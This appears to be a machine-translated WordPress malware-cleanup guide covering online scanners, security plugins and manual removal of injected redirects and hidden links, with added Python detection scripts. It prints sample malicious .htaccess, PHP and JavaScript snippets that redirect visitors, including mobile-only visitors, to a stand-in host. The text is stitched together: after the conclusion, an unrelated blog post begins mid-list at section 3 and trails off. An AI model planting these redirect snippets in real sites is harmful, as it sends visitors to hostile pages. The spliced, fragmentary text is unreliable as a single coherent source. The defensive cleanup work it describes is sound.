Finding and removing malicious code on WordPress. How to find malicious code and hidden links in a template

Before you figure out how to clean up a WordPress site, you need to understand what, in fact, we will be dealing with. In a broad sense, the term “virus” refers to malicious software that can cause some kind of damage to the owner of a web resource. Thus, almost any code embedded by attackers into engine scripts can be included in this category. These can be hidden links that lead to pessimization in search results, backdoors that provide admin access to a hacker, or complex structures that turn the site into a zombie network node, and even a bitcoin miner. We will talk about how to identify and eliminate viruses of various calibers, as well as protect against them.

Many of the tips from the previous articles also protect a site from infection. For example, since "infections" are frequently bundled with pirated templates and plugins, refusing such components altogether is an important security step. There are, however, a number of more specific points.

1. Install a reliable antivirus

A malicious program can be introduced not only from the outside - the computer from which the project is administered can be the source of infection. Modern Trojans can not only steal the FTP password, but also download the executable code on their own, or modify CMS files, which means that the safety of your web resource directly depends on the security of your working machine.

The IT market offers many antiviruses. However, the most reasonable choice is the products of large companies:
● Among domestic products, the leading positions are held by Kaspersky Lab and Dr.Web;
● Among foreign commercial solutions, the Norton line from Symantec Corporation and the popular ESET NOD32 stand out;
● Among free options, Avast and Comodo are the undisputed leaders.

2. Scan the site using online services

If suspicious activity is detected (engine errors, slowdowns, pop-up windows and third-party banners), the simplest thing to do is run the resource through an online scanner that can establish whether it is infected. The undisputed leader here is VirusTotal, at virustotal.com. To use it, open the “URL” tab, enter the link of interest and click “Check!”.

After a while, the system will issue a report with the following content:

It should be clarified that VirusTotal is not an independent scanner but an aggregator of anti-virus engines, which makes it possible to check WordPress for viruses in 67 systems at once. Its undoubted advantage is a detailed report with data from every supported service. Bear in mind that antiviruses are fond of false alarms, so even if the detection rate is not ideal (for example, 3/64), this does not mean the resource is infected. Focus first of all on the large players (Kaspersky, McAfee, Symantec NOD32 and others); small vendors often classify harmless sections of code as dangerous, so do not take those results seriously.

3. Use Yandex.Webmaster

You have probably noticed that some links in the search results are provided with a warning message: “The site may threaten your computer or mobile device.” The fact is that the search engine has its own algorithms for detecting malicious code, notifying users of the potential risk. To be aware of what is happening and be the first to receive notifications, it is enough to register in the Webmaster service. You can view all the necessary information on the “Security” tab:

If a threat is detected, information about the infected pages is displayed here. Unfortunately, a selective check of WordPress for viruses is not possible: Yandex performs the scanning on its own schedule, and not every uploaded web document gets into the sample, only a randomly chosen part of them.

4. Check Google Reports

The most popular search engine in the world offers an even easier way to monitor - just follow the link google.com/transparencyreport/safebrowsing/diagnostic/?hl=ru and enter the address of the site of interest in the appropriate field. You will receive comprehensive data on the resource, and see if Google has any claims in terms of detecting malicious scripts:

How to clean a WordPress site from malicious links?

Let's move on from general recommendations to specific ones. Let's start with common variants of malicious code - the introduction of extraneous URLs and redirects to the target web resource. Unfortunately, black hat SEO is still popular, which means that hackers are not sitting idle, since this task is one of the easiest. Let's sort it out in order.

1. Redirect to third-party resources

Imagine the situation: you open your own website but are immediately sent to a “leisure” catalog or a landing page offering to make money on Forex. This almost certainly means the web resource has been hacked and a few new lines have appeared in .htaccess. Treatment is elementary: open the file, find the directives containing the address the redirect goes to, and delete them. For the hypothetical malwaresite.com, the constructions may look like this:

    <IfModule mod_alias.c>
    Redirect 301 https://site/ http://malwaresite.com/
    </IfModule>

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_HOST} !^tekseo\.su [NC]
    RewriteRule ^(.*) http://malwaresite.com/$1
    </IfModule>

A more sophisticated option is a permanent redirect written in PHP. If you have checked .htaccess and found nothing suspicious, the problem most likely lies in the index.php file. Here the redirection is done by sending the appropriate headers to the visitor, usually from an included file:

    <?php
    include("redirect.php");
    exit();
    ?>

Remember - there are no such fragments in the original index.php, so you can safely delete them all. Also find and eliminate the include file (in our example it will be redirect.php located in the root folder).

A more tricky move is a redirect for mobile gadgets. Accessing your resource from a personal computer, you will never reveal the fact of infection, however, users of smartphones and tablets will be unpleasantly surprised when they get to another page. Such a redirect can be implemented:

1. .htaccess
The simplest way, and the easiest to spot. The device is determined from the User-Agent presented by the browser. It might look like this:

    <IfModule mod_rewrite.c>
    RewriteEngine on
    RewriteBase /
    RewriteCond %{HTTP_USER_AGENT} ^.*(ipod|iphone|android).* [NC]
    RewriteRule ^(.*)$ http://malwaresite.com/
    </IfModule>

2. PHP
A redirect is implemented similarly in PHP; the construct below can be found in the index file. Again, do not forget about the ubiquitous include:

    <?php
    // Reconstructed from the garbled listing: the original also tested a second,
    // truncated pattern against substr($uagent, 0, 4), which is omitted here.
    $uagent = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match("/(android|bb\d+|meego).+mobile|ip(hone|od)|blackberry|zte\-/i", $uagent)) {
        header("Location: http://malwaresite.com/");
        exit();
    }
    ?>

3. JavaScript
Here the screen resolution is checked: if the width is 480 pixels or less, the visitor is redirected to a malicious site. If your project legitimately uses a similar technique, be sure to check this block for changed addresses.

    <script type="text/javascript">
    if (screen.width <= 480) { window.location = "http://malwaresite.com"; }
    </script>
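The three redirect variants above (an .htaccess RewriteRule to another host, a header("Location: ...") or extra include in index.php, and a window.location assignment in inline JavaScript) can be hunted with a small script rather than by eye. The following Python scanner is an added example written for this article, not code from the original page or from any of the tools it describes; it assumes the site's own hostname is example.com, and the .htaccess, PHP and JavaScript samples it scans are constructed to mirror the fragments shown above:

```python
import re
from urllib.parse import urlparse

# Assumption: the site's own hostname; any other host counts as external.
SITE_HOST = "example.com"

# .htaccess directives that can send a visitor elsewhere.
HTACCESS_RE = re.compile(r"^\s*(Redirect(?:Match)?|RewriteRule)\b(.*)$", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>\]]+", re.I)
# PHP: header("Location: ...") and string-literal include/require.
PHP_HEADER_RE = re.compile(r"header\s*\(\s*[\"']\s*location\s*:\s*([^\"']+)", re.I)
PHP_INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*[\"']([^\"']+)[\"']", re.I)
# JavaScript: window.location / location.href assignment to a literal.
JS_LOC_RE = re.compile(r"(?:window\.)?location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']", re.I)


def is_external(url, site_host=SITE_HOST):
    """True when the URL names a host and that host is not our own site."""
    host = urlparse(url.strip()).hostname
    return bool(host) and host.lower() != site_host.lower()


def scan_htaccess(text, site_host=SITE_HOST):
    """(line, directive, url) for Redirect/RewriteRule targets pointing off-site."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = HTACCESS_RE.match(line)
        if not m:
            continue
        for url in URL_RE.findall(m.group(2)):
            if is_external(url, site_host):
                hits.append((n, m.group(1), url))
    return hits


def scan_php(text, site_host=SITE_HOST):
    """Off-site Location headers plus every string-literal include (index.php has none)."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for url in PHP_HEADER_RE.findall(line):
            if is_external(url, site_host):
                hits.append((n, "header-location", url.strip()))
        for path in PHP_INCLUDE_RE.findall(line):
            hits.append((n, "include", path))
    return hits


def scan_js(text, site_host=SITE_HOST):
    """Off-site location assignments in inline JavaScript."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for url in JS_LOC_RE.findall(line):
            if is_external(url, site_host):
                hits.append((n, "location", url))
    return hits


# Constructed samples: the stock WordPress block followed by an injected mobile redirect.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^.*(ipod|iphone|android).* [NC]
RewriteRule ^(.*)$ http://malwaresite.com/
</IfModule>
"""
SAMPLE_INDEX_PHP = """<?php
include("redirect.php"); exit();
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
"""
SAMPLE_MOBILE_PHP = r"""<?php
$uagent = $_SERVER['HTTP_USER_AGENT'];
if (preg_match("/(android|bb\d+|meego).+mobile|ip(hone|od)|blackberry|zte\-/i", $uagent))
    header("location: http://malwaresite.com/");
"""
SAMPLE_JS = """<script type="text/javascript">if (screen.width<=480) { window.location = "http://malwaresite.com"; }</script>
<script>if (!user) { window.location = "/wp-login.php"; }</script>
"""

if __name__ == "__main__":
    print(".htaccess:", scan_htaccess(SAMPLE_HTACCESS))
    print("index.php:", scan_php(SAMPLE_INDEX_PHP))
    print("mobile php:", scan_php(SAMPLE_MOBILE_PHP))
    print("js:", scan_js(SAMPLE_JS))
```

The stock WordPress rewrite block produces no findings because its RewriteRule target is a local path, while the injected rule, the extra include in index.php, the Location header and the inline script are each reported with their line number; the relative "/wp-login.php" assignment is ignored as internal.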

2. Check outgoing links

A redirect, however, is a crude and obvious method. Far more common is the injection of URLs hidden with CSS and other tricks, and you cannot fight what you cannot see. The excellent Xenu Link Sleuth utility lets you evaluate your WordPress link profile. Its latest version was released in 2010, but it is still relevant today and even works fine under Windows 10.

With Xenu installed and running, click File - Check URL. You will see a window:


Here it is enough to enter the project domain, and click OK. It is also possible to add filters by mask:
● Consider URLs beginning with this as 'internal' - consider addresses containing the specified fragment as internal;
● Do not check any URLs beginning with this - allows you to exclude certain links from checking (for example, if you want to see only outgoing links, enter the site domain here).

Upon completion of the procedure, the utility will offer to check WordPress for the so-called orphan files - web documents that do not have a single URL.

If you answer in the affirmative, a data entry window for FTP authorization will appear:


This function can be useful if the site is old and has undergone a lot of changes during its existence: it can be used to clear the directories of “garbage”. However, we are more interested in the scan results:

Thus, if there are viruses on WordPress that cause hidden URLs to appear, Xenu will help to detect the fact of their presence. The only question is how to proceed.

3. Search and destroy

Let's imagine that Xenu found active links to a hypothetical malwaresite.com. How to find and remove them? Sometimes the task is extremely simple. Non-professionals act rudely, limiting themselves only to hiding the URL from prying eyes, but the address itself can be written explicitly in the code. The following options are possible:
1. Placement of the url in the footer instead of copyright;
2. Using the orphan files described above (for example, an html document is loaded into a directory with images - search engines can also index it);
3. Manipulating Cascading Style Sheets:
● text-indent: -9999999999px or position: absolute; left: -9999999999px - moves the link off-screen;
● display: none or visibility: hidden - makes the text invisible;
● font-size: 1px - a single-pixel URL that cannot be seen.

To find and remove such a virus from a WordPress site, it is enough to scan the entire engine for lines containing “malwaresite.com”. On Windows, this can be done with the free file manager Unreal Commander:

1. Upload all project files to a local folder on your computer using FileZilla, as described in the previous article;
2. Launch Unreal Commander and click the spyglass icon to enter the search interface;

3. Select the desired folder, check the "With text" field, enter "malwaresite.com", specify all encodings and click "Start Search".

The result will be a list of files in which the phrase was found. Now it remains to edit them by removing the lines of code responsible for displaying the link.
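The hidden-link tricks listed above and the “With text” search for the domain can be combined into one scan over a local copy of the site. This Python script is an added example, not part of the original article or of Unreal Commander; it assumes the site's own host is example.com, flags external <a href> links that are hidden inline, hidden through a CSS class, or placed in an HTML file under uploads, and runs on a constructed set of sample files (load_tree() reads a real downloaded copy instead):

```python
import os
import re
from urllib.parse import urlparse

LINK_RE = re.compile(r"<a\s[^>]*?href=[\"']([^\"']+)[\"']", re.I)
# The CSS tricks from the text: off-screen offsets, display/visibility, 1px text.
HIDING_RE = re.compile(
    r"text-indent\s*:\s*-\d{3,}|left\s*:\s*-\d{3,}|display\s*:\s*none"
    r"|visibility\s*:\s*hidden|font-size\s*:\s*[01]px", re.I)
CSS_RULE_RE = re.compile(r"\.([\w-]+)\s*\{([^}]*)\}")
CLASS_ATTR_RE = re.compile(r"class=[\"']([^\"']*)[\"']", re.I)


def hidden_classes(files):
    """Names of CSS classes whose rule hides or offsets the element."""
    names = set()
    for path, text in files.items():
        if path.endswith(".css"):
            for name, body in CSS_RULE_RE.findall(text):
                if HIDING_RE.search(body):
                    names.add(name)
    return names


def hiding_reason(path, line, hidden):
    """Why a link on this line would be invisible, or None if it is not hidden."""
    if HIDING_RE.search(line):
        return "inline-style"
    for attr in CLASS_ATTR_RE.findall(line):
        used = set(attr.split()) & hidden
        if used:
            return "class:" + ",".join(sorted(used))
    if path.startswith("wp-content/uploads/") and path.endswith((".html", ".htm", ".php")):
        return "html-in-uploads"   # orphan document planted among the images
    return None


def find_external_links(files, site_host):
    """(path, line, href, reason) for every <a href> pointing off-site."""
    hidden = hidden_classes(files)
    out = []
    for path in sorted(files):
        for n, line in enumerate(files[path].splitlines(), 1):
            for href in LINK_RE.findall(line):
                host = urlparse(href).hostname
                if host and host.lower() != site_host.lower():
                    out.append((path, n, href, hiding_reason(path, line, hidden)))
    return out


def grep_domain(files, domain):
    """The 'With text' search from the article: every line mentioning the domain."""
    return [(p, n) for p in sorted(files)
            for n, l in enumerate(files[p].splitlines(), 1) if domain in l]


def load_tree(root, exts=(".php", ".html", ".htm", ".css", ".js")):
    """Read a downloaded site copy into the {relative path: text} form used above."""
    files = {}
    for d, _, names in os.walk(root):
        for name in names:
            if name.endswith(exts):
                full = os.path.join(d, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[rel] = fh.read()
    return files


# Constructed sample copy of a site: a footer link hidden inline, a sidebar link hidden
# by a CSS class, a legitimate external link, and an HTML file dropped under uploads.
SAMPLE_FILES = {
    "wp-content/themes/mytheme/footer.php":
        '<div id="copyright">&copy; 2024 Example <a href="http://malwaresite.com/" style="display:none">cheap loans</a></div>\n',
    "wp-content/themes/mytheme/style.css":
        '.hid { position: absolute; left: -9999999999px; }\n',
    "wp-content/themes/mytheme/sidebar.php":
        '<div class="hid"><a href="http://malwaresite.com/x">x</a></div>\n'
        '<a href="https://wordpress.org/">WordPress</a>\n',
    "wp-content/uploads/2019/index.html":
        '<html><body><a href="http://malwaresite.com/">...</a></body></html>\n',
}

if __name__ == "__main__":
    for hit in find_external_links(SAMPLE_FILES, "example.com"):
        print(hit)
    print(grep_domain(SAMPLE_FILES, "malwaresite.com"))
```

Links with a reason of None are external but visible (such as the wordpress.org credit) and usually legitimate; the rest are the candidates to edit out, and grep_domain() gives the same file list the article obtains with the file manager's text search.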

Using PHP Antivirus for WordPress

The cases described above are just the tip of the iceberg. A professional hacker can find a non-standard approach even to such a simple task as placing a hidden backlink. As a rule, you will not be able to find anything on your own, without the help of the appropriate software. Fortunately, such solutions exist, many of them, moreover, are free. Let's take a look at the most effective ones.

1. AI-Bolit

Probably the most popular antivirus product from Revisium. Available in two versions: to work directly on the hosting, and a local machine running Windows (compatible with 10, does not require installation). Unfortunately, the *nix version does not have a web interface and is only suitable for a VDS or Dedicated server, so we will analyze how to work with the tool on a PC.

1. Download the utility from revisium.com/kb/scan_site_windows.html and unzip it anywhere convenient on your computer. Note that the directory path must not contain Cyrillic letters, so the easiest option is the root of a drive;
2. Inside the archive, you will see the following: a folder with the “aibolit” antivirus itself, “site” (here you need to copy the checked web documents, all of them will be scanned, regardless of the nesting level), as well as three bat files:
● start — for a quick check;
● start_paranoic - deep scan to identify any suspicious code fragments;
● scan_and_quarantine — the script will place all dangerous files in an archive.
3. To start, double-click one of the bat files depending on the result you want. The scan will run and produce the report AI-BOLIT-REPORT.html (viewable in any browser). In quarantine mode, the suspicious scripts are also placed in an archive.

Of course, there is actually no malware at all. And, as you can see in the screenshot, the developers themselves warn about the likelihood of errors.

2. Manul

In addition to monitoring, Yandex offers everyone to use a free antivirus of their own design. Written in PHP, Manul can be run on almost any web server and is compatible with most popular CMS. In addition, the script can not only detect, but also remove dangerous code. Below is a step-by-step guide to identifying and treating viruses.

1. Download the program at https://download.cdn.yandex.net/manul/manul.zip;
2. Unzip the archive to the root directory of your site;
3. Open site_name/manul/index.php in your browser;
4. Create a password. The script has serious security requirements: the passphrase must be at least 8 characters long, contain capital letters, numbers and special characters.
5. Now you can start scanning by clicking on the button of the same name. You can also customize the script by setting the request interval. The larger this value (in seconds), the longer it will take to check. The coefficient can be set to zero, however, on low-power hosting, this can lead to a significant increase in response time, up to the unavailability of the resource.
6. After that, the check will start - do not close the tab before it ends!
7. When the scan is completed, a window will appear with a button to download the report. Click on it to download scan_log.xml.zip.

8. In another browser tab, open the analyzer located at https://antimalware.github.io/manul/. Click on the “Upload file” button and send the resulting archive for verification.

9. At this stage, we proceed directly to the removal of viruses from the WordPress site. A window will open in front of you, in which you can select operations on dangerous files (depending on the degree of threat, they are marked with a red, yellow, or green flag). The “Quarantine” button allows you to archive suspicious files, and the “Delete” button allows you to get rid of them forever.

10. Having completed the desired actions, scroll down the page and copy the code that appears in the “Prescription” field

11. Now return to the Manul tab, go to the “Treatment” section, paste the received code into the field that appears and click “Execute”.


13. Upon completion of all procedures, a log window will appear on the screen. You can also download quarantined files, if available

3. Santi

A relatively young project designed to detect and eliminate viruses on a WordPress site. Currently, the product is in beta testing and is free, the only paid service is SMS notification of the owner about detected threats. In addition to the monitoring module itself, the script offers consumers many tools to eliminate the consequences of intruders' activities. But about them - later, first we will deal with the installation.

1. Download the distribution kit from the official site santivi.com. Unpack the contents of the archive into a folder previously created on the hosting in the root directory, for example: /var/www/website/public_html/santi_av

The above is a simple name, but it's best to use a random sequence of lowercase English letters and numbers.

2. Go to the antivirus page. In our example, the address will look like this: https://site/public_html/santi_av

4. At the first start, you need to configure the script by checking the automatically set parameters and making adjustments, if any. Also be sure to change the data for authorization:

5. Register on the product website, then fill in the "Personal information" section by entering the received SANTI ID, E-mail address and mobile phone (optional - needed for SMS distribution). Subsequently, you can turn on preferred notification methods on the “Informing” tab.

6. On the “Files and DB” tab, specify information for connecting to MySQL, and also select a method for backing up web resource files. The following options are supported:

● creating a local copy;
● an FTP server;
● Yandex.Disk;
● Google Drive;
● Dropbox.

7. After completing the above manipulations, click on the “Finish” button. If everything went well, the following will appear on the screen:

You can change the settings in the program section of the same name.

“Santi” has an intuitive interface and contains everything you need to effectively remove viruses from your WordPress site. The tools are divided into thematic sections. Let's consider each of them:

1. Home.

Here you will find the most necessary information about the protection status. From the notifications section, you can issue commands on actions to be taken with detected threats.

2. Autopilot

Allows you to configure the actions performed by the script in automatic mode. Among them:
● File Monitor - scans the integrity of web documents, except for dynamic ones (access logs, errors, etc.). Checks modification date, hash sum, appearance of new directories and files.
● Database monitoring - captures suspicious activity in MySQL.
● Backup - completely backs up the site at set intervals, keeping a copy on the server or in cloud storage. The settings are configured through the corresponding tool in the “Utilities” section (directories and files can be selected individually). The output is an archive in the proprietary .sabu format, which only Santi itself and its companion program for Windows PCs can process.
● Checking the site through the eyes of search engines - uses information from Yandex and Google about threats detected on the resource.
● Scanning the site through the eyes of desktop antiviruses - scanning based on signatures provided by the largest companies that develop solutions in the field of cybersecurity for PCs.
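Santi's File Monitor is described above in terms of modification dates, hash sums and the appearance of new directories and files, with dynamic content such as logs left out. The following Python script is an added example of that technique written for this article, not Santi's own code; its exclusion list (.log/.tmp files and wp-content/cache/) is an assumption, and demo() builds a constructed site tree in a temporary directory, takes a baseline, applies a few changes and reports the difference:

```python
import hashlib
import json
import os
import tempfile

# Assumption: what counts as "dynamic" and is left out of the baseline.
DYNAMIC_SUFFIXES = (".log", ".tmp")
DYNAMIC_DIRS = ("wp-content/cache/",)


def is_dynamic(rel):
    return rel.endswith(DYNAMIC_SUFFIXES) or rel.startswith(DYNAMIC_DIRS)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Hash, size and mtime of every non-dynamic file plus the list of directories."""
    files, dirs = {}, []
    for d, subdirs, names in os.walk(root):
        for sub in subdirs:
            dirs.append(os.path.relpath(os.path.join(d, sub), root).replace(os.sep, "/"))
        for name in names:
            full = os.path.join(d, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if is_dynamic(rel):
                continue
            st = os.stat(full)
            files[rel] = {"sha256": sha256_file(full), "size": st.st_size,
                          "mtime": int(st.st_mtime)}
    return {"files": files, "dirs": sorted(dirs)}


def compare(old, new):
    """Classify differences between two snapshots."""
    of, nf = old["files"], new["files"]
    both = set(of) & set(nf)
    return {
        "added": sorted(set(nf) - set(of)),
        "removed": sorted(set(of) - set(nf)),
        "modified": sorted(p for p in both if of[p]["sha256"] != nf[p]["sha256"]),
        # Same content but a new timestamp: worth a look, often harmless.
        "touched": sorted(p for p in both if of[p]["sha256"] == nf[p]["sha256"]
                          and of[p]["mtime"] != nf[p]["mtime"]),
        "added_dirs": sorted(set(new["dirs"]) - set(old["dirs"])),
    }


def save_snapshot(snap, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(snap, fh, indent=1, sort_keys=True)


def load_snapshot(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def _write(root, rel, text):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Constructed site tree: baseline, then a handful of changes, then the report."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php require __DIR__ . '/wp-blog-header.php';\n")
        _write(root, "readme.html", "<html>WordPress readme</html>\n")
        _write(root, "wp-content/themes/t/functions.php", "<?php // theme functions\n")
        _write(root, "wp-content/debug.log", "notice\n")
        base = snapshot(root)
        # Changes after the baseline (constructed for the example).
        _write(root, "wp-content/debug.log", "notice\nanother notice\n")   # dynamic: ignored
        _write(root, "wp-content/themes/t/functions.php",
               "<?php // theme functions\n// unexpected extra line\n")
        _write(root, "wp-content/uploads/2019/x.php", "<?php // unexpected new file\n")
        os.remove(os.path.join(root, "readme.html"))
        idx = os.path.join(root, "index.php")
        t = os.stat(idx).st_mtime + 600
        os.utime(idx, (t, t))                                                # same content, new mtime
        return compare(base, snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

In practice save_snapshot() runs right after a clean install or a verified cleanup, and a scheduled job compares a fresh snapshot against it; a new .php file under uploads or a changed hash in a theme file is exactly the kind of event the monitor is meant to surface.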

3. Utilities.

Here is a set of auxiliary tools designed to help maintain the site and ensure its security. Consider the most interesting:
● Date-search. It is useful if the period of infection is approximately known. With the help of filters, you can set the time range, as well as list file extensions and specify how to process them (exclude from search or check).
● Configurator.ftpaccess. Used to configure FTP servers based on ProFTPD and Pure-FTP.
● Removal of malicious inserts. It will be useful if the WordPress site has suffered from a virus, and you know exactly its code. You can specify the beginning and end of a dangerous fragment, list the types of files that need to be processed/excluded, separated by commas, and select the action “search” or “search and disinfect”. In the latter case, the given sequence will be automatically deleted when it is found.
● File editor. Supports work in several encodings, line numbering, elementary syntax highlighting.

Specialized antiviruses for WordPress

In addition to those listed, there are more narrowly focused solutions made in the form of plugins for CMS. Let's analyze the most effective.

1. AntiVirus

How to check WordPress templates for viruses? The answer lies in a small module with an extremely uncomplicated name and a very ascetic interface. The settings window prompts us to run a manual scan (Manual malware scan), or enable automatic monitoring of the project (Check the theme templates for malware). The second checkbox allows you to connect Google Safe Browsing databases. It is also possible to enter an email address - in this case, reports will be sent to your E-mail.

If you click the “Scan the theme templates now” button, all templates installed in the system will be immediately scanned. The page will appear:

The utility highlights suspicious fragments with a red frame. Of course, false positives are also possible - in this case, AntiVirus has allocated a block of code responsible for preventing the display of messages about erroneous authorization. In such cases, just click on the “There is no virus” button.

2. TAC

Another highly focused module is Theme Authenticity Checker. After installation, it will appear in the “Appearance” section of the admin panel. There is no need to configure and run anything here at all - the plugin conducts a fully automatic scan and issues a conclusion without any details:

3. Quttera

A more advanced module that scans the entire engine. Two types of verification are available: external — using an online service:

and internal - using the script of the plugin itself. To launch them, just click on the “Scan Now” button.

The result of the check will be the following report:

As you can see, the antivirus separates all found files into potentially dangerous, suspicious and malicious ones. Such a classification is largely conditional - like its counterparts, Quttera tends to raise false alarms. It is best to put the plugin on a site that is obviously clean and run primary monitoring, which results in adding all “rejected” files to the white list. To do this, just go to the “Detected Threats” tab and click “WhiteList File” under each warning.

4. Sucuri Security

This plugin is the most advanced of the specialized ones. The disadvantages include mandatory registration on the official developer resource and obtaining an API key, otherwise the functionality will be limited. A corresponding warning will appear immediately after activation.

By clicking on the button, you will see the following window:

The administrator's domain name and email are determined automatically, but the latter can be changed. The DNS Lookups checkbox should only be checked if you are using CloudProxy.

Before you figure out how to protect WordPress from viruses, you need to properly configure the extension in the Settings section. Here you will see several tabs at once. In General, you can set the main parameters:
● Plugin API Key - allows you to enter an API key;
● Data Storage Path - the directory where Sucuri Security stores logs, the list of checked files and other service information (by default /uploads/sucuri);
● Reverse Proxy and IP Address Discoverer - activate if external proxy services or a firewall sit in front of the site;
● Failed Login Password Collector - includes tracking of failed login attempts on the site;
● User Comment Monitor - Check the content of comments added by users. Helps protect against both spam and malicious inserts;
● XML HTTP Request Monitor - filters Ajax requests, may adversely affect site response time;
● Audit Log Statistics — display of event statistics, here you can set the number of analyzed records (by default — 500);
● Date & Time - allows you to change the time and date if they are defined incorrectly;
● Reset Options - reset the default settings (useful if you start experiencing problems with site performance or scripts after installing the plugin, but you can't figure out what's wrong).

The “Scanner” tab allows you to:
● Start a forced scan with the “Fast Scan” button;
● Choose one of three algorithms (SPL - the fastest, Global - the slowest and most thorough, or OpenDir - the golden mean);
● Set the scan frequency (by default — 2 times a day);
● Enable and manage the file system scanner (FS Scanner);
● Set up report analyzer and clear logs.

On the “Alerts” tab, you can specify an email address for sending notifications, as well as set a message template by choosing from those offered, or by entering your own in the “Custom” field.

Here you can also set the frequency of sending emails and parameters for detecting brute force attacks.

Below you can fine-tune alerts. In addition to the default checkboxes, it is worth activating all those related to user actions; this helps catch spammers and brute-forcers.

It is also worth including all the items related to the status of plugins (marked with a plug) and templates (marked with a brush). This will not load the system, but it will help to detect the actions of an attacker who has gained access to the project and made changes to its configuration.

The “Ignore Scanning” section allows you to specify directories that do not need to be scanned (you must specify the absolute path to the folder). It is worth adding the locations of video and audio files here: checking them is pointless, and it will eat up a lot of server resources, which will negatively affect performance.

“Ignore Alerts” allows you to exclude changes to certain types of content (post-types) from alerts.

The “Trust IP” tab allows you to set ranges of IP addresses, actions from which will not be registered by the system. It is convenient if the work with the project is carried out by a group of people from the same subnet.

“Heartbeat” configures the API of the same name, used for two-way server-browser communication. It is mainly useful for workgroups; if you are the sole owner of the site, it is better to turn it off altogether, which removes an additional attack surface and improves engine performance.

After making all the edits, you can start scanning in the Malware Scan section with the corresponding button:

In addition to the scanner itself, Sucuri Security includes a number of tools that help protect WordPress from viruses before the site is hacked. They are collected in the Hardening section. I will list the options:
● Verify WordPress version - monitors the relevance of the core engine and allows you to run a forced update;
● Website Firewall protection - CloudProxy connection (WAF must be preconfigured on the corresponding tab);
● Remove WordPress version - removes the CMS version display;
● Block PHP files - blocks access to service files via .htaccess (for Apache), or offers recommendations for configuring Nginx;
● Verify PHP version - checks if the version of the installed interpreter is up to date;
● Security key - will let you know if you forgot to update the security keys in wp-config.php;
● Information leakage (readme.html) - removes the Readme file containing information potentially useful to a hacker;
● Default admin account - checks if the admin login is used for the super administrator account;
● Plugin & Theme editor - blocks the built-in template editor in one click;
● Database table prefix - reminds you to replace the MySQL table prefix with a unique one, instead of the default wp_.

The Post-Hack section will come in handy after you have cleaned your WordPress site of viruses. There are three tools here:
● Security keys - allows you to create a new set of security keys and replace compromised ones;
● Reset User's Password - will help you bulk reset the passwords of registered users of your choice;
● Reset Plugins - Reverts all installed plugins to known safe versions, with the exception of premium add-ons.

Let's summarize

After reading the article, you are convinced that fighting malware is nothing out of the ordinary. Thanks to the availability of specialized solutions, even a non-professional can check a WordPress template for viruses, monitor the CMS core and clean the site in case of infection. But just as in medicine, in IT the key to success is not cure but prevention. Remember: hackers pose a threat not only to you and your project, but also to the visitors of the web resource, and often it is they who suffer by opening infected pages. This risks the most important thing, the trust of users, which inevitably results in the loss of regular readers and even customers. Therefore, it is very important to take care of security as early as possible, minimizing the likelihood of hacking.


Hello Idea Fox friends!

I don't know about you, but I don't sleep well at night. Blog security issues torment me. I can't take it anymore :-)

I read a bunch of blogs on this topic and tested many plugins that help solve this problem. Yes, and in the comments they began to ask questions on the topic of protecting the site, which prompted me to write this note.

Just imagine that you are blogging, writing articles, trying ... And evil assholes come and break your site. I think that there will be a lot of disappointments.

After all, every normal blogger invests a lot of time and effort in developing his site. For many, blogging becomes an obsession ... Now imagine if SUCH happens :-)

Well, you understand how important this is.

Let's finally get down to business :)

A couple of months ago I already wrote a note about protection from hacking. Be sure to read it. But quite a lot of time has passed since then, and I have taken additional measures to strengthen the all-round defense.

In the following notes, I will definitely dwell on this issue in detail. (I also remember and write about setting up ISP)

3. Checking the site on other online services

There are countless such services. I have a strong opinion that many of them are completely stupid and created solely to display ads.

Doctor Web

Dr.Web has made a good service for checking websites online. It once personally helped me find an infection on a friend's blog (there was third-party code in the .htaccess file).

The check is very simple. Enter your URL and wait for the result of the check.

antivirus-alarm.ru

A powerful site scanner that uses as many as 43 anti-virus databases from the world's leading anti-virus companies.

Here, too, everything is very simple. We drive in the URL of our site and with bated breath we are waiting for the scan results.

This is what I've been waiting for.

Everything is clean, you can sleep peacefully :-)

All this is certainly good, but you also need to install a couple of plugins that do not interfere at all with WordPress blogs.

4. Ask the host to check your site

The fact is that hosters are even more concerned about security issues than you are and have powerful protection tools. And specialized means of protection.

Here is my news for you today. Next, I will talk about a very powerful plugin that allows you to significantly protect your WordPress blog from hacking.

I have been working with it for 2 months and am very pleased with it. So far I've dealt with it 3 times and banned myself :-) In short, there is something to tell.

Periodic checking of the site for malicious viruses is necessary; this is the first commandment of any self-respecting webmaster. Even if you use a clean Twenty Eleven theme, it is not a fact that over time it has not become infected either. This phenomenon can (and most often does) occur due to the fact that the WordPress engine itself was originally designed for online publishing. So it never hurts to check again and make a copy of the site and database.

